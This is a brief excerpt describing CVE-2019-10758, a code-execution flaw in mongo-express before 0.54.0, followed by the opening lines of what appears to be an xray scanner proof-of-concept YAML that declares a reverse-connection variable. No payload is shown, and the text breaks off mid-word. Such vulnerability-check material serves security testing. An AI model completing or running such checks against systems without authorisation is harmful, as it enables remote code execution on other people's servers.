https://github.com/chaitin/xray-plugins/blob/main/poc/manual/mongo-express-cve-2019-10758.yml

标题： mongo-express 安全漏洞 (CVE-2019-10758)
描述：mongo-express是一款用于交互式管理MongoDB数据库的、基于Web的轻量级管理界面。 mongo-express 0.54.0之前版本中存在安全漏洞。攻击者可借助使用toBSON方法的端点利用该漏洞执行代码。

Mongo Express CVE-2019-10758 Code Execution

 name: poc-yaml-mongo-express-cve-2019-10758
manual: true
transport: http
set:
    reverse: newRevers

...